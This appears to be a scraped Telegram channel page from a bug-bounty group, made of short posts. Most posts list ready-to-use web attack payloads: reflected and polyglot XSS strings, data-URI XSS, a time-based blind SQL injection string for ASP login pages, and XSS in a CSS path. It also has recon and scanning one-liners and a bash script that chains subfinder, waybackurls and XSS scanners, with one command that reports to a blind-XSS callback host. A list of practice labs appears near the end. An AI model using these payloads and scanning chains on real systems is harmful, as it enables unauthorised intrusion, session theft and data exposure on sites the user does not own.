Brut Security
14.8K subscribers
920 photos
73 videos
287 files
976 links
βœ…Queries: @wtf_brut
πŸ›ƒWhatsApp: wa.link/brutsecurity
🈴Training: brutsec.com
πŸ“¨E-mail: [email protected]
Download Telegram
πŸ₯°6❀2
πŸ”₯18
Top 3 RXSS payloads

`'";//><img/src=x onError="${x};alert(`1`);">

`'";//><Img Src=a OnError=location=src>

`'";//></h1><Svg+Only%3d1+OnLoad%3dconfirm(atob("WW91IGhhdmUgYmVlbiBoYWNrZWQgYnkgb3R0ZXJseSE%3d"))>
❀6πŸ”₯3❀‍πŸ”₯1πŸ‘1
Simple Reflected XSS
1. subfinder -d target .com | httprobe -c 100 > target.txt
2. cat target.txt | waybackurls | gf xss | kxxs
πŸ₯°7πŸ”₯3
Brut Security
Simple Reflected XSS 1. subfinder -d target .com | httprobe -c 100 > target.txt 2. cat target.txt | waybackurls | gf xss | kxxs
For Automation Reflected XSS Scanning
#!/bin/bash

# Prompt user for domain input
read -p "Enter the domain you want to scan: " domain

# Define output file
output_file="scan_output.txt"

# Run subfinder to find subdomains, filter through httprobe, and save to target.txt
echo "Finding subdomains for $domain..."
subfinder -d $domain | httprobe -c 100 > target.txt

# Use waybackurls to find URLs from Wayback Machine, filter through gf for XSS, and scan with kxxs
echo "Scanning for XSS vulnerabilities..."
cat target.txt | waybackurls | gf xss | kxxs >> "$output_file"

# Display output file location
echo "Scan output saved to $output_file"
πŸ”₯6❀2
🚨Toxicache🚨
πŸ‘‰Golang scanner to find web cache poisoning vulnerabilities in a list of URLs and test multiple injection techniques.
πŸ”—https://lnkd.in/gdtpJGmT
⚑5❀3πŸ”₯2πŸ‘1🌭1
Awesome Bug Bounty One-liners

A collection of awesome one-liner scripts especially for bug bounty.

Open-redirect

Bash
export LHOST="URL"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'

Bash
cat URLS.txt | gf url | tee url-redirect.txt && cat url-redirect.txt | parallel -j 10 curl --proxy https://127.0.0. .1:8080 -sk > /dev/null

XSS
waybackurls HOST | gf xss | sed 's/=.*/=/' | sort -u | tee FILE.txt && cat FILE.txt | dalfox -b YOURS.xss.ht pipe > OUT.txt

Bash
cat HOSTS.txt | getJS | httpx --match-regex "addEventListener\((?:'|\")message(?:'|\")"

πŸ“š Repositories:
1. https://lnkd.in/dMBdxSQD

2. https://lnkd.in/ebTrAP8y

3. https://lnkd.in/dmG4G3ea

4. https://lnkd.in/dXxHMUu9
πŸ‘10πŸ”₯5
Useful XSS payloads:

"/*\"/*`/*' /*</template> </textarea></noembed></noscript></title> </style></script>-->&lt;svg onload=/*<html/*/onmouseover=alert()//>

data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTIGJ5IFZpY2tpZScpPC9zY3JpcHQ+"

data:text/html,<script>alert(1)</script>

<select><noembed></select><script x='a@b'a>
❀11πŸ‘4πŸ‘Ž1πŸ”₯1
Cyber Security Lab Practice, RED & BLUE Team.

πŸŒ€Attack-Defense - https://attackdefense.com
πŸŒ€Alert to win - https://aalf.nu/alert1
πŸŒ€Bancocn - https://bancocn.com
πŸŒ€Buffer Overflow Labs - https://lnkd.in/eNbEWYh
πŸŒ€CTF Komodo Security - https://ctf.komodosec.com
πŸŒ€CryptoHack - https://cryptohack.org/
πŸŒ€CMD Challenge - https://cmdchallenge.com
πŸŒ€Explotation Education - https://exploit.education
πŸŒ€Google CTF - https://lnkd.in/e46drbz8
πŸŒ€HackTheBox - Dr. AITH - https://www.hackthebox.com
πŸŒ€Hackthis - https://www.hackthis.co.uk
πŸŒ€Hacksplaining - https://lnkd.in/eAB5CSTA
πŸŒ€Hacker101 - https://ctf.hacker101.com
πŸŒ€Capture The Flag - Hacker Security - https://lnkd.in/ex7R-C-e
πŸŒ€Hacking-Lab - https://hacking-lab.com/
πŸŒ€ImmersiveLabs - https://immersivelabs.com
πŸŒ€NewbieContest - https://lnkd.in/ewBk6fU5
πŸŒ€OverTheWire - https://overthewire.org
πŸŒ€Practical Pentest Labs - https://lnkd.in/esq9Yuv5
πŸŒ€Pentestlab - https://pentesterlab.com
πŸŒ€Penetration Testing Practice Labs - https://lnkd.in/e6wVANYd
πŸŒ€PentestIT LAB - https://lab.pentestit.ru
πŸŒ€PicoCTF - https://picoctf.com
πŸŒ€PWNABLE - https://lnkd.in/eMEwBJzn
πŸŒ€Root-Me - https://www.root-me.org
πŸŒ€Root in Jail - https://rootinjail.com
πŸŒ€SANS Challenger - https://lnkd.in/e5TAMawK
πŸŒ€SmashTheStack - https://lnkd.in/eVn9rP9p
πŸŒ€The Cryptopals Crypto Challenges - https://cryptopals.com
πŸŒ€Try Hack Me - https://tryhackme.com
πŸŒ€Vulnhub - https://www.vulnhub.com
πŸŒ€Vulnmachine - https://lnkd.in/eJ2e_kD
πŸŒ€W3Challs - https://w3challs.com
πŸŒ€WeChall - https://www.wechall.net
πŸŒ€Websploit - https://websploit.org/
πŸŒ€Zenk-Security - https://lnkd.in/ewJ5rNx2
πŸŒ€Cyberdefenders - https://lnkd.in/dVcmjEw8
πŸŒ€LetsDefend- https://letsdefend.io/
❀8πŸ‘2πŸ”₯1
Tricky ASP blind SQL Injection in a login page.
PayloadπŸ‘‡
';%20waitfor%20delay%20'0:0:6'%20--%20
πŸ‘9πŸ”₯8
XSS in the .css URL path

Original url: "target/lib/css/animated.min.css"

XSS Found in:
"/lib/css/animated.min'"/><script%20>alert(document.domain)<%2fscript>.css"
πŸ”₯24πŸ‘3πŸ‘1
Recon like a Boss.pdf
1.3 MB
πŸ”₯11❀4πŸ‘2πŸ‘1